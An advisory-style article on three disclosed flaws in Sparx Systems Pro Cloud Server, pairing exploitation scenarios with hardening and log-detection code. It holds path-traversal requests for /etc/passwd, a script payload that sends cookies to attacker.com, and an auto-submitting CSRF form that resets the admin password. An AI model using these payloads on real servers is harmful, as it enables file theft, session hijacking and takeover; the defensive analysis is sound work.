Critical Vulnerabilities in Sparx Systems Pro Cloud Server
Introduction
Sparx Systems Pro Cloud Server is a collaborative modeling platform used by enterprises for managing complex system architectures. Recently, three critical vulnerabilities were disclosed by the National Cyber Security Centre Finland that could compromise the security of organizations using this software. This article provides an in-depth analysis of each vulnerability along with realistic exploitation scenarios.
1. CVE-2025-4377: Path Traversal Vulnerability in logview.php
Technical Analysis: The vulnerability exists in the logview.php component of Pro Cloud Server's Configuration interface. Due to improper limitation of pathname references (a classic path traversal flaw), attackers can read arbitrary files on the filesystem by manipulating file path parameters.
Affected Versions: All versions prior to the patched release (believed to be fixed in version 6.0.165)
Exploitation Scenario
Step 1: Identifying the vulnerable endpoint
An attacker discovers that the Pro Cloud Server configuration interface is exposed at:
https://target-company.com/ProCloudServer/config/logview.php
Step 2: Crafting the malicious request
The attacker sends a GET request containing directory traversal sequences:
GET /ProCloudServer/config/logview.php?file=../../../../../../etc/passwd HTTP/1.1
Host: target-company.com
Step 3: Bypassing potential defenses
If basic filters are in place, the attacker might use URL encoding:
GET /ProCloudServer/config/logview.php?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1
Impact:
- Disclosure of sensitive system files (passwd, shadow, etc.)
- Access to application configuration files containing credentials
- Potential access to EA model files with proprietary information
Mitigation:
- Upgrade to the latest patched version
- Implement strict input validation for file parameters
- Apply the principle of least privilege to the web server process
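The following is an added illustration of the "strict input validation" item above, not code from Sparx Systems or from the advisory: the requested file name is percent-decoded, joined to an assumed log directory (a placeholder path, since the product's real log location is not given), canonicalised, and served only if the canonical path is still inside that directory. Both the plain "../" request and the "%2e%2e%2f" variant shown in the scenario are rejected.

```python
import os
from urllib.parse import unquote

# Assumed directory the log viewer may serve from; the product's real log
# location is not given in the advisory, so this value is a placeholder.
LOG_ROOT = "/var/opt/procloudserver/logs"


def resolve_log_path(requested, root=LOG_ROOT):
    """Return the canonical path of `requested` inside `root`, or None.

    The value is percent-decoded twice so the plain "../" form, the
    "%2e%2e%2f" form and a double-encoded variant all normalise to the same
    thing before the containment check. realpath() then collapses "..", "."
    and symlinks, so the comparison is made on the real filesystem location
    rather than on the string the client sent.
    """
    decoded = unquote(unquote(requested))
    if "\x00" in decoded:
        return None  # NUL bytes are never legitimate in a log file name
    root_real = os.path.realpath(root)
    # An absolute `decoded` makes os.path.join discard `root`; the
    # containment check below rejects that case as well.
    candidate = os.path.realpath(os.path.join(root_real, decoded))
    if not candidate.startswith(root_real + os.sep):
        return None  # escaped the log directory (or named the directory itself)
    return candidate


def is_allowed(requested, root=LOG_ROOT):
    return resolve_log_path(requested, root) is not None


if __name__ == "__main__":
    for sample in ("server.log",
                   "../../../../../../etc/passwd",
                   "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
                   "/etc/passwd"):
        verdict = "allowed" if is_allowed(sample) else "rejected"
        print(f"{sample!r:48} -> {verdict}")
```

Blocking "../" as a substring alone is not enough; comparing canonical paths is what makes the check hold against encoding tricks and symlinks.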
2. CVE-2025-4376: Cross-Site Scripting (XSS) in WebEA Model Search
Technical Analysis: The WebEA component's model search functionality fails to properly sanitize user input, allowing stored XSS attacks. This is particularly dangerous as WebEA is designed for collaborative work, meaning malicious scripts would execute in the context of multiple authenticated users.
Affected Versions: All versions earlier than 6.0.165
Exploitation Scenario
Step 1: Identifying the vulnerable search field
The attacker finds that search terms in WebEA are reflected without proper output encoding:
https://target-company.com/WebEA/models/search?term=TEST
Step 2: Crafting the malicious payload
The attacker creates a specially crafted EA model containing JavaScript in searchable fields:
<script>
fetch('https://attacker.com/steal?cookie='+document.cookie);
</script>
Alternatively, for reflected XSS:
https://target-company.com/WebEA/models/search?term=<script>alert(document.domain)</script>
Step 3: Social engineering
The attacker tricks a privileged user into accessing the malicious link or model, potentially through:
- Phishing email with the crafted link
- Comments in shared models referencing the malicious search term
Impact:
- Session hijacking of authenticated users
- Unauthorized actions performed with victim's privileges
- Potential complete compromise of the Pro Cloud Server if admin users are targeted
Mitigation:
- Implement proper output encoding for all user-controllable data
- Add Content Security Policy headers
- Upgrade to the patched version
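An added illustration of the first two mitigations, written for this article rather than taken from WebEA's code: a vulnerable renderer that interpolates the search term directly is shown next to one that HTML-encodes it, and the response handler attaches a Content Security Policy. The endpoint shape and the CSP value are assumptions; the point is that encoding happens at output time, so it covers both the reflected term and text stored in model fields.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Assumed policy for the WebEA pages. 'self' for script-src blocks inline
# <script> blocks outright, and fetch() to attacker.com is refused because
# connect-src falls back to default-src 'self'.
CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'"


def render_search_vulnerable(term):
    # Direct interpolation: the term becomes markup, so a term (or a stored
    # model field) containing <script> runs in the viewer's browser.
    return f"<h2>Results for: {term}</h2>"


def render_search(term):
    """Encode the term at output time so the browser shows it as text."""
    safe = html.escape(term, quote=True)  # also encodes quotes for attributes
    return f"<h2>Results for: {safe}</h2>"


def handle_search(url):
    """Build (headers, body) for a WebEA search URL with the hardened renderer."""
    query = parse_qs(urlsplit(url).query)
    term = query.get("term", [""])[0]
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": CSP,
        "X-Content-Type-Options": "nosniff",
    }
    return headers, render_search(term)


if __name__ == "__main__":
    probe = "https://target-company.com/WebEA/models/search?term=%3Cscript%3Ealert(1)%3C/script%3E"
    hdrs, body = handle_search(probe)
    print(hdrs["Content-Security-Policy"])
    print(body)
```

The CSP is a second layer, not a replacement for encoding; a policy that allows 'unsafe-inline' would give no protection against the payload in the scenario.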
3. CVE-2025-4375: CSRF Leading to Configuration Password Change
Technical Analysis: The entire Pro Cloud Server application lacks proper CSRF protections, but the most critical manifestation allows attackers to change the server's configuration password. This would give attackers administrative control over the Pro Cloud Server configuration.
Affected Versions: All versions earlier than 6.0.165
Exploitation Scenario
Step 1: Identifying the password change endpoint
The attacker profiles the application and finds the password change function at:
POST /ProCloudServer/config/changepassword HTTP/1.1
Host: target-company.com
Content-Type: application/x-www-form-urlencoded
newpass=NEWPASSWORD&confirm=NEWPASSWORD
Step 2: Crafting the malicious page
The attacker hosts a page containing:
<html>
<body>
<form action="https://target-company.com/ProCloudServer/config/changepassword" method="POST">
<input type="hidden" name="newpass" value="hacked123" />
<input type="hidden" name="confirm" value="hacked123" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
Step 3: Luring the victim
An authenticated administrator visits the attacker's page while logged into Pro Cloud Server. The form submits automatically and changes the password to "hacked123".
Impact:
- Complete compromise of Pro Cloud Server configuration
- Ability to modify server settings, access tokens, and connection strings
- Potential pivot point to internal systems via stored credentials
Mitigation:
- Implement CSRF tokens for all state-changing operations
- Require re-authentication for sensitive actions
- Upgrade to the patched version
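An added example of the CSRF-token mitigation, not taken from Pro Cloud Server's code: a simulated handler for the changepassword endpoint from the scenario above that accepts the request only when the Origin (or Referer) header is the site itself and the form carries a per-session token derived with HMAC from an assumed server secret. The auto-submitting form on the attacker's page has neither, so it is refused before any password is changed.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

# Assumed values: a per-deployment secret generated at install time and the
# site's own origin. Neither comes from the product; both are placeholders.
SERVER_SECRET = secrets.token_bytes(32)
SITE_ORIGIN = "https://target-company.com"


def csrf_token(session_id):
    """Per-session token: HMAC-SHA256 over the session id, keyed with the
    server secret. It is embedded in the legitimate password form, so a page
    hosted elsewhere cannot read or forge it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def change_password(headers, body, session_id):
    """Simulated handler for POST /ProCloudServer/config/changepassword.

    Two independent checks: the Origin (or Referer) header must be the site
    itself, and the form must carry a token that matches the session. A
    cross-site form post fails both; a same-site post without the hidden
    token field fails the second.
    """
    origin = headers.get("Origin") or headers.get("Referer") or ""
    if origin != SITE_ORIGIN and not origin.startswith(SITE_ORIGIN + "/"):
        return 403, "cross-site request rejected"
    form = parse_qs(body)
    token = form.get("csrf_token", [""])[0]
    if not hmac.compare_digest(token, csrf_token(session_id)):
        return 403, "missing or invalid CSRF token"
    if not form.get("newpass") or form.get("newpass") != form.get("confirm"):
        return 400, "passwords missing or do not match"
    return 200, "password changed"


if __name__ == "__main__":
    sid = "session-1234"  # constructed session id
    forged = {"Origin": "https://attacker.example"}
    print(change_password(forged, "newpass=hacked123&confirm=hacked123", sid))
    legit = {"Origin": SITE_ORIGIN}
    form = f"newpass=N3wPass&confirm=N3wPass&csrf_token={csrf_token(sid)}"
    print(change_password(legit, form, sid))
```

Re-authentication (asking for the current password on the same form) is a third check worth adding for this endpoint; it is left out here to keep the token logic in view.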
Comprehensive Defense Strategy
Immediate Actions:
- Upgrade to Pro Cloud Server version 6.0.165 or later
- Audit logs for signs of exploitation
- Rotate all credentials stored in or used by Pro Cloud Server
Network Controls:
- Restrict access to the configuration interface to specific IP ranges
- Implement WAF rules to detect path traversal and XSS attempts
Long-term Measures:
- Conduct regular security assessments of EA environments
- Implement monitoring for unusual file access patterns
- Train users on recognizing phishing attempts
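For the "audit logs for signs of exploitation" and WAF items above, here is an added detection script (written for this article, not a Sparx Systems tool) that walks access-log lines in the common log format and flags the three request patterns described in the advisory: traversal sequences sent to logview.php, script markup in the WebEA search term, and any POST to the configuration password-change endpoint. The log lines are constructed to mirror the scenarios; the regular expressions are a starting point to tune, not a complete rule set.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (common log format) that mirror the requests
# described in the advisory; no real server produced them.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2025:10:01:02 +0000] "GET /ProCloudServer/config/logview.php?file=server.log HTTP/1.1" 200 5120
203.0.113.7 - - [10/Jun/2025:10:01:09 +0000] "GET /ProCloudServer/config/logview.php?file=../../../../../../etc/passwd HTTP/1.1" 200 2048
203.0.113.7 - - [10/Jun/2025:10:01:15 +0000] "GET /ProCloudServer/config/logview.php?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 2048
198.51.100.4 - - [10/Jun/2025:10:02:00 +0000] "GET /WebEA/models/search?term=<script>alert(document.domain)</script> HTTP/1.1" 200 900
198.51.100.4 - - [10/Jun/2025:10:02:30 +0000] "GET /WebEA/models/search?term=%3Cscript%3E HTTP/1.1" 200 900
192.0.2.9 - - [10/Jun/2025:10:03:00 +0000] "POST /ProCloudServer/config/changepassword HTTP/1.1" 302 0
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# Markup that should never appear in a search term; \bon\w+= catches inline
# event handlers without matching words like "someone=".
XSS_RE = re.compile(r"<script|javascript:|\bon\w+=")


def classify(line):
    """Return a finding for a suspicious request line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Decode twice so encoded and double-encoded payloads are seen in clear;
    # lower-case so the matching is case-insensitive.
    uri = unquote(unquote(m["uri"])).lower()
    path, _, query = uri.partition("?")
    if path.endswith("/config/logview.php") and ("../" in query or "..\\" in query):
        rule = "path-traversal"
    elif path.endswith("/webea/models/search") and XSS_RE.search(query):
        rule = "xss-attempt"
    elif m["method"] == "POST" and path.endswith("/config/changepassword"):
        rule = "config-password-change"  # always worth reviewing: CSRF target
    else:
        return None
    return {"ip": m["ip"], "time": m["ts"], "rule": rule, "status": int(m["status"])}


def scan(log_text):
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged logview.php request is the case to escalate, since it indicates the traversal returned content; a password change from an address the administrators do not recognise should trigger the credential rotation listed under Immediate Actions.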
Conclusion
These vulnerabilities collectively present a critical risk to organizations using vulnerable versions of Sparx Systems Pro Cloud Server. The combination of path traversal, XSS, and CSRF could allow attackers to completely compromise the application and potentially pivot to other systems in the environment. Immediate patching and thorough security reviews are strongly recommended for all affected organizations.